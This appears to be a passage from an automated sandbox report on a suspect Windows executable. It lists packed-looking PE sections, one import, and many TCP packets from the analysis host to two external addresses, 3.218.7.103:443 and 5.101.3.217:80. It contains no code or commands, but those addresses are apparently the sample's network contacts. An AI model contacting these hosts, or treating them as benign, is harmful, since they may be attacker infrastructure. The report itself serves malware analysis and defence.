                                    mizvqalk0xa670000x1b30000x1b2400a10c934d2243881ac69caadeee5a055fFalse0.9943081642199194data7.9554844362049995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    acywuead0xc1a0000x10000x400e69b565e97f26ccd0d9ed18206ac5527False0.8046875data6.269331223390831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0xc1b0000x30000x2200a11d2da9382e837e0b35a32100110694False0.07755055147058823DOS executable (COM)1.0204033753989519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_MANIFEST0xc191e80x152ASCII text, with CRLF line terminators0.6479289940828402

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 27, 2024 08:47:44.477300882 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:44.477365017 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:44.477426052 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:44.491295099 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:44.491345882 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.289877892 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.306855917 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.306870937 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.309175014 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.309267998 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.311377048 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.311495066 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.319449902 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.319458008 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.371233940 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.707123995 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.707266092 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:46.707350969 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.740154028 CET49708443192.168.2.113.218.7.103
                                    Dec 27, 2024 08:47:46.740164042 CET443497083.218.7.103192.168.2.11
                                    Dec 27, 2024 08:47:48.585196018 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.704951048 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.705384016 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.713882923 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833441973 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833476067 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833542109 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833554983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833581924 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833581924 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833596945 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833620071 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833651066 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833664894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833704948 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833717108 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833815098 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833836079 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833852053 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833863974 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833865881 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.833884001 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.833913088 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.953403950 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.953423023 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.953444958 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.953525066 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.953577042 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.953619003 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.953634024 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.953663111 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.953684092 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.953690052 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.953738928 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:48.996948957 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:48.997076035 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.116816998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.116972923 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.160859108 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.160979986 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.276823997 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.365113020 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.365171909 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.608906984 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.608958960 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.758327961 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.758510113 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.758605003 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878144979 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878160000 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878204107 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878248930 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878252983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878299952 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878323078 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878349066 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878360033 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878398895 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878451109 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878470898 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878496885 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878511906 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878655910 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878667116 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878709078 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878787994 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878798008 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.878834963 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.878998995 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879064083 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.879149914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879188061 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.879219055 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879230022 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879240990 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879354000 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879405022 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879522085 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879641056 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879657030 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879738092 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879791975 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.879888058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880055904 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880110979 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880156040 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880290031 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880331039 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.880351067 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880381107 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.880398989 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880417109 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.880438089 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.880522966 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.880579948 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.997952938 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.997972012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998064995 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.998121023 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998162985 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.998205900 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998322010 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998457909 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998620987 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998806953 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998817921 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998848915 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998970032 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.998980045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999136925 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999145985 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999165058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999268055 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999278069 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999351025 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999365091 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999618053 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.999902010 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999912977 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:49.999959946 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:49.999991894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000035048 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000036955 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000077963 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000158072 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000200987 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000207901 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000246048 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000248909 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000288010 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000369072 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000387907 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000411034 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000422955 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000426054 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000463963 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000494957 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000535011 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000566959 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000605106 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.000643969 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000685930 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000782967 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000792980 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000875950 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.000897884 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001019955 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001055002 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001082897 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001168966 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001178980 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001188040 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001261950 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001292944 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001374006 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001465082 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001507044 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001516104 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001605988 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001642942 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001714945 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001724005 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001759052 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001842976 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001878977 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001910925 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001975060 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002023935 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002125025 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002134085 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002218008 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002269983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002307892 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002326012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002402067 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.117984056 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118163109 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118172884 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118299007 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118309975 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118357897 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118493080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119055986 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.119152069 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.119343996 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119610071 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119621992 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119661093 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119669914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119786024 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119796038 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119885921 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120059013 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120069027 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120141983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120224953 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120234013 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120445013 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120455027 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120465994 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120476007 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120565891 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120574951 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120697975 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120708942 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120795012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120804071 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120937109 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120949984 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121162891 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121172905 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121258974 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121267080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121321917 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121330976 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121442080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121450901 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121575117 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121584892 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121701002 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121710062 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121818066 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121828079 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122020006 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122030020 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122039080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122179985 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122189999 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122199059 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122251034 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122261047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122337103 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122428894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122438908 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122585058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122594118 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122603893 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122893095 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.123133898 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.123209000 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.238722086 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238735914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238821983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238831997 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238905907 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238915920 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239043951 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239053965 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239121914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239132881 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239308119 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239337921 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239389896 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239398956 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239466906 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239475965 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239629030 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239639997 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239650965 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239756107 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239767075 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239778996 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239851952 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239861012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239938021 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239948034 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240073919 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240082979 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240165949 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240175009 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240252972 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240262032 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240390062 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240398884 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240509033 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240519047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240530968 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240540028 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240621090 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240629911 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240720987 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240730047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240852118 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240860939 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240951061 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240962029 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241023064 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241030931 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241147995 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241158962 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241168022 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241245985 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241255045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242324114 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242712021 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.242778063 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242851973 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242909908 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242921114 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243004084 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243012905 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243099928 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243108988 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243221045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243230104 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243359089 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243369102 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243421078 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243429899 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243552923 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243563890 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243663073 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243671894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243735075 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243745089 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243818045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243827105 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243923903 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243932962 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244019032 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244030952 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244110107 CET80497105.101.3.217192.168.2.11
